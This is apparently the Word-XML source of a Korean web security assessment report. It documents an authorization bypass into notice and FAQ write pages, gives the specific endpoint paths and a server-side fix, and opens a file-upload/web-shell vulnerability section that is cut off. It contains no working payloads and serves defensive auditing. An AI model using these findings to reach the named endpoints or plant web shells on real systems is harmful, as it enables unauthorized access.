                          <a:ext cx="1122219" cy="1177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E7A2C" id="직사각형 1444394006" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:172pt;margin-top:95.3pt;width:88.35pt;height:9.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4WuAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvND/dtmzUbLVqtQip&#10;KhUt6tnr2JtIjm1s72aXW3kHJN6ACweeC5V3YGwn6apUHBA5OLZn5hvPNz+nZ9tWoA0ztlGyxNlB&#10;ihGTVFWNXJX4w+3i1WuMrCOyIkJJVuIds/hs9vLFaacLlqtaiYoZBCDSFp0uce2cLpLE0pq1xB4o&#10;zSQIuTItcXA0q6QypAP0ViR5mh4nnTKVNooya+H2IgrxLOBzzqh7x7llDokSw9tcWE1Yl35NZqek&#10;WBmi64b2zyD/8IqWNBKcjlAXxBG0Ns0fUG1DjbKKuwOq2kRx3lAWYoBosvRJNDc10SzEAuRYPdJk&#10;/x8svdpcG9RUkLvJZHI4nQCnGEnSQq4evt0/fP7+88f9r69f0J4YOOu0LcD0Rl+b/mRh6wnYctP6&#10;P4SGtoHn3cgz2zpE4TLL8jzPphhRkGXZycnxoU9E8mitjXVvmGqR35TYQB4DvWRzaV1UHVS8M6kW&#10;jRBwTwohUQeg0/QoDRZWiabyUi+0ZrU8FwZtCJTDYpHC1zveU4NnCAmv8THGqMLO7QSLDt4zDoxB&#10;HHn04GuVjbCEUiZdFkU1qVj0drTvbLAIMQsJgB6ZwytH7B5g0IwgA3ZkoNf3piyU+mjch/4349Ei&#10;eFbSjcZtI5V5LjIBUfWeo/5AUqTGs7RU1Q7qyajYaFbTRQMZvCTWXRMDnQU9CNPCvYOFCwWZUv0O&#10;o1qZT8/de30oeJBi1EGnlth+XBPDMBJvJbTCFErTt3Y4TI5OcjiYfclyXyLX7bmC7GcwlzQNW6/v&#10;xLDlRrV3MFTm3iuIiKTgu8TUmeFw7uIEgbFE2Xwe1KCdNXGX8kZTD+5Z9RV6u70jRvdl7KABrtTQ&#10;1aR4Us1R11tKNV87xZtQ6o+89nzDKAiF048tP2v2z0HrcbjOfgMAAP//AwBQSwMEFAAGAAgAAAAh&#10;ANAG1Q7gAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyoXVOaNsSpAAkh&#10;EAco7d2Nt0lU/0Sxm4S3ZznBcTSjmW+KzeQsG7CPbfAK5jMBDH0VTOtrBbuv55sVsJi0N9oGjwq+&#10;McKmvLwodG7C6D9x2KaaUYmPuVbQpNTlnMeqQafjLHToyTuG3ulEsq+56fVI5c5yKcSSO916Wmh0&#10;h08NVqft2Sn4CKcjt3sp37LHF5m9utVYD+9KXV9ND/fAEk7pLwy/+IQOJTEdwtmbyKyC28WCviQy&#10;1mIJjBJ3UmTADgqkWM+BlwX//6H8AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALr/jha4&#10;AgAApAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANAG&#10;1Q7gAAAACwEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F44FCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5313ADFD" wp14:editId="18A66FEF">
            <wp:extent cx="4572000" cy="2195465"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="14605"/>
            <wp:docPr id="1444394004" name="그림 144439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787" b="58075"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2195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375B59" w14:textId="6971C865" w:rsidR="0071585E" w:rsidRDefault="00F44FCD" w:rsidP="0071585E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc20909464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68</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">페이지 소스코드를 통해 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>획득</w:t>
      </w:r>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w14:paraId="5211E70A" w14:textId="77777777" w:rsidR="0071585E" w:rsidRDefault="0071585E" w:rsidP="0071585E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518A8EAD" w14:textId="541FABB9" w:rsidR="0071585E" w:rsidRDefault="000C5CC5" w:rsidP="0071585E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251760640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E0BBEEF" wp14:editId="4420E8AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1965960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>302895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1870364" cy="187036"/>
                <wp:effectExtent l="0" t="0" r="15875" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394007" name="직사각형 1444394007"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1870364"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CC24" id="직사각형 1444394007" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:154.8pt;margin-top:23.85pt;width:147.25pt;height:1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LitQIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG8mO8xMiB0YCFwWC&#10;JGhSZE1TlCWA4rAkbdndpXco0Bt000XPVaR36JCUFCMNuijqBc3RzLzhvPmcnm0aSdbC2BpUTkd7&#10;KSVCcShqtczph7v5m2NKrGOqYBKUyOlWWHo2ff3qtNWZGEMFshCGIIiyWatzWjmnsySxvBINs3ug&#10;hUJlCaZhDkWzTArDWkRvZDJO08OkBVNoA1xYi18vopJOA35ZCu6uy9IKR2RO8W0unCacC38m01OW&#10;LQ3TVc27Z7B/eEXDaoVBB6gL5hhZmfoPqKbmBiyUbo9Dk0BZ1lyEHDCbUfosm9uKaRFyQXKsHmiy&#10;/w+WX61vDKkLrN1kMtk/maTpESWKNVirx28Pj5+///zx8OvrF7KjRs5abTN0vdU3ppMsXj0Bm9I0&#10;/h9TI5vA83bgWWwc4fhxdHyU7h9OKOGoi4IvRPLkrY11bwU0xF9yarCOgV62vrQumvYmPpiCeS0l&#10;fmeZVKRF0JP0IA0eFmRdeK1XWrNcnEtD1gzbYT5P8dcF3jHDZ0iFr/E5xqzCzW2liAHeixIZwzzG&#10;MYLvVTHAMs6FcqOoqlghYrSD3WC9R8hZKgT0yCW+csDuAHrLCNJjRwY6e+8qQqsPzl3qf3MePEJk&#10;UG5wbmoF5qXMJGbVRY72PUmRGs/SAoot9pOBOGhW83mNFbxk1t0wg5OFM4jbwl3jUUrASkF3o6QC&#10;8+ml794eGx61lLQ4qTm1H1fMCErkO4WjcIKt6Uc7CJODozEKZlez2NWoVXMOWP0R7iXNw9XbO9lf&#10;SwPNPS6VmY+KKqY4xs4pd6YXzl3cILiWuJjNghmOs2buUt1q7sE9q75D7zb3zOiujR0OwBX0U82y&#10;Z90cbb2ngtnKQVmHVn/iteMbV0FonG5t+V2zKwerp+U6/Q0AAP//AwBQSwMEFAAGAAgAAAAhAJxK&#10;fZXfAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoXVPFbcimAiSEQByg&#10;0LubuElUex3FbhL+HnOC42qeZt4W29lZNpohdJ4QlgsBzFDl644ahK/Pp5s1sBA11dp6MgjfJsC2&#10;vLwodF77iT7MuIsNSyUUco3QxtjnnIeqNU6Hhe8NpezoB6djOoeG14OeUrmzXAqRcac7Sgut7s1j&#10;a6rT7uwQ3v3pyO1eylf18CzVi1tPzfiGeH01398Bi2aOfzD86id1KJPTwZ+pDswi3IpNllCElVLA&#10;EpCJ1RLYAUEpCbws+P8Pyh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAnJKS4rUCAACk&#10;BQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAnEp9ld8A&#10;AAAJAQAADwAAAAAAAAAAAAAAAAAPBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABsG&#10;AAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0071585E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29868860" wp14:editId="3D8B6425">
            <wp:extent cx="4572000" cy="1135859"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="1444394005" name="그림 144439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53" b="78280"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1135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A56E3A" w14:textId="5C6215EC" w:rsidR="00C366B0" w:rsidRDefault="0071585E" w:rsidP="00C366B0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="_Toc20909464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69</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">획득한 </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 접근 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w14:paraId="396CC763" w14:textId="77777777" w:rsidR="00C366B0" w:rsidRDefault="00C366B0" w:rsidP="00C366B0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D410355" w14:textId="66828D1F" w:rsidR="00C366B0" w:rsidRDefault="00C366B0" w:rsidP="00C366B0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52404929" wp14:editId="278DA414">
            <wp:extent cx="4572000" cy="3106119"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="18415"/>
            <wp:docPr id="1444394008" name="그림 14443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909" r="1645" b="26691"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="31061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01FEAB" w14:textId="0FB57A4F" w:rsidR="00C366B0" w:rsidRDefault="00C366B0" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc209094643"/>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70</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공지사항 작성 페이지 접근</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w14:paraId="703ACA36" w14:textId="51F99A6D" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960349C" w14:textId="77777777" w:rsidR="00BE3695" w:rsidRPr="00CB22A6" w:rsidRDefault="00BE3695" w:rsidP="00BE3695">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BE3695" w:rsidRPr="00B112DB" w14:paraId="1E493111" w14:textId="77777777" w:rsidTr="005E1156">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ACF2C26"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8DD81B9"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4C680D5"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887390" w:rsidRPr="00B112DB" w14:paraId="60FD0B2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8EC09CD" w14:textId="0E7F6F3F" w:rsidR="00887390" w:rsidRPr="00CB22A6" w:rsidRDefault="00887390" w:rsidP="0088739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40F942" w14:textId="4A5A2876" w:rsidR="00887390" w:rsidRPr="00CB22A6" w:rsidRDefault="00145B4D" w:rsidP="00887390">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">공지사항 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>소스코드</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1A70F26" w14:textId="3D7EA63C" w:rsidR="00887390" w:rsidRPr="00CB22A6" w:rsidRDefault="00887390" w:rsidP="00887390">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/notice/openNoticeWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00887390" w:rsidRPr="00B112DB" w14:paraId="0B61150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6A1DC04" w14:textId="6A25B917" w:rsidR="00887390" w:rsidRPr="00CB22A6" w:rsidRDefault="00887390" w:rsidP="0088739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82612A" w14:textId="1C6DDC24" w:rsidR="00887390" w:rsidRDefault="00145B4D" w:rsidP="00887390">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">AQ &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>소스코드</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6D66EB0" w14:textId="3EBC2D47" w:rsidR="00887390" w:rsidRPr="00987A57" w:rsidRDefault="00887390" w:rsidP="00887390">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B5B69">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>faq</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B69">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Faq</w:t>
            </w:r>
            <w:r w:rsidRPr="006B5B69">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Write.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38913444" w14:textId="77777777" w:rsidR="00BE3695" w:rsidRDefault="00BE3695" w:rsidP="00BE3695">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358EE494" w14:textId="77777777" w:rsidR="00BE3695" w:rsidRPr="00CB22A6" w:rsidRDefault="00BE3695" w:rsidP="00BE3695">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458A0E47" w14:textId="656FAB38" w:rsidR="00553E54" w:rsidRDefault="00553E54" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">중요 페이지에 우회하여 </w:t>
      </w:r>
      <w:r w:rsidR="00713763">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">접근할 방안을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>차단하고</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">모든 중요 페이지에 대해 세션 및 권한 검증이 이뤄지도록 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Server Side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>방식으로 구현해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1034442A" w14:textId="77777777" w:rsidR="00553E54" w:rsidRDefault="00553E54">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027BA14" w14:textId="0C9625B5" w:rsidR="00553E54" w:rsidRDefault="007E7004" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="_Toc209094568"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>파일 업로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:p w14:paraId="4F1A5B4B" w14:textId="77777777" w:rsidR="00553E54" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412D37C5" w14:textId="70EB043F" w:rsidR="00553E54" w:rsidRPr="00B5070A" w:rsidRDefault="00A14D3E" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일 업로드 기능에서 파일의 확장자에 대한 검증 미흡으로 인해 생기는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격자가 악성 파일을 서버에 저장</w:t>
      </w:r>
      <w:r w:rsidR="00787CB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하고</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 실행하여 권한 탈취,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>데이터 유출 등으로 이어지는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC14D24" w14:textId="77777777" w:rsidR="00553E54" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B95058" w14:textId="77777777" w:rsidR="00553E54" w:rsidRPr="00CB22A6" w:rsidRDefault="00553E54" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CAB9C" w14:textId="0AA0F528" w:rsidR="00553E54" w:rsidRDefault="00864C18" w:rsidP="00864C18">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일</w:t>
      </w:r>
      <w:r w:rsidRPr="00864C18">
        <w:t xml:space="preserve"> 확장자 검증 없이 업로드가 가능한 경우, 공격자가 웹쉘 등을 업로드하여 시스템 명령 실행 및 내부 자원 탈취가 가능한 취약점이 발견되었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9B7F3" w14:textId="77777777" w:rsidR="00D332F0" w:rsidRPr="00864C18" w:rsidRDefault="00D332F0" w:rsidP="00864C18">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A07730" w14:textId="3C1E41F3" w:rsidR="00553E54" w:rsidRPr="00A76CE7" w:rsidRDefault="00836DD2" w:rsidP="00553E54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251776000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51372B76" wp14:editId="7FDC556C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4671060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>971550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="82550" cy="1390650"/>
                <wp:effectExtent l="0" t="0" r="69850" b="57150"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394009" name="직선 화살표 연결선 1444394009"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="82550"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512EA" id="직선 화살표 연결선 1444394009" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:367.8pt;margin-top:76.5pt;width:6.5pt;height:1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vIgIAAFYEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNGm3u9pGTffQpVwQ&#10;VPw8gOvYiSX/yTZNewTxAkhICGkP3LiuEE+Fuu/A2EmzuyAOIHJwMvZ838x8M878Yqck2jLnhdEl&#10;Ho9yjJimphK6LvHrV6tH5xj5QHRFpNGsxHvm8cXi4YN5aws2MY2RFXMISLQvWlviJgRbZJmnDVPE&#10;j4xlGg65cYoEMF2dVY60wK5kNsnzs6w1rrLOUOY97F52h3iR+DlnNDzn3LOAZIkht5BWl9ZNXLPF&#10;nBS1I7YRtE+D/EMWiggNQQeqSxIIeuPEb1RKUGe84WFEjcoM54KyVANUM85/qeZlQyxLtYA43g4y&#10;+f9HS59t1w6JCno3nU5PZtM8n2GkiYJeHb6+Pbz/gm4+fzy8+37z4QodPl3/+HYd9+44g4Kt9QUQ&#10;LfXa9Za3axfl2HGn4hsKRbuk+n5Qne0CorB5Pjk9hdZQOBmfzPIzMIAluwVb58MTZhSKHyX2wRFR&#10;N2FptIb+GjdOypPtUx864BEQI0uNWiCe5UAbbW+kqFZCymS4erOUDm0JjMdqlcPTx77nFoiQj3WF&#10;wt6CLMEJomvJek+pIdmoQFdz+gp7ybrgLxgHdaHKLsk012wISShlOowHJvCOMA7pDcA+7Xgh/gTs&#10;/SOUpZn/G/CASJGNDgNYCW1cJ9r96GF3TJl3/kcFurqjBBtT7dM0JGlge